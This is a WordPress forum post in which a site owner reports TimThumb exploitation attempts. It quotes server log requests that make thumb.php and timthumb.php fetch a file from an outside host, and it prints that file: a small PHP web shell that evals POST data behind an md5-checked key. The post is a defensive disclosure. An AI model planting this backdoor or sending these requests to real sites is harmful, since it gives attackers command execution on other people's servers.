See this for more details: http://ma.tt/2011/08/the-timthumb-saga/

This support forum is for blogs hosted at WordPress.com. If your question is about a self-hosted WordPress blog then you'll find help at the WordPress.org forums.

If you don't understand the difference between WordPress.com and WordPress.org, you may find this information helpful.

If you forgot to include a link to your blog, you can reply and include it below. It'll help people to answer your question.

This is an automated message.

Remote Address:[removed]
Remote Port:47762
Request Method:GET
Referer:
Query String:
Request URI:/home/wp-content/themes/mystique/thumb.php?src=http://blogger.com.bloggera.net/images.php
User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

And also

Remote Address:[removed]
Remote Port:47764
Request Method:GET
Referer:
Query String:
Request URI:/home/wp-content/themes/mystique/timthumb.php?src=http://blogger.com.bloggera.net/images.php
User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

The content of the File "images.php" is

::::BINARY CODE PAYLOAD::::
<?php
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
$cmd = $_POST["code"];
eval (stripslashes($cmd));
}
?>

Looks like they are trying to gain CMD on my Apache server

If you guys are getting the same, I suggest you block PHP files in your wp-content folder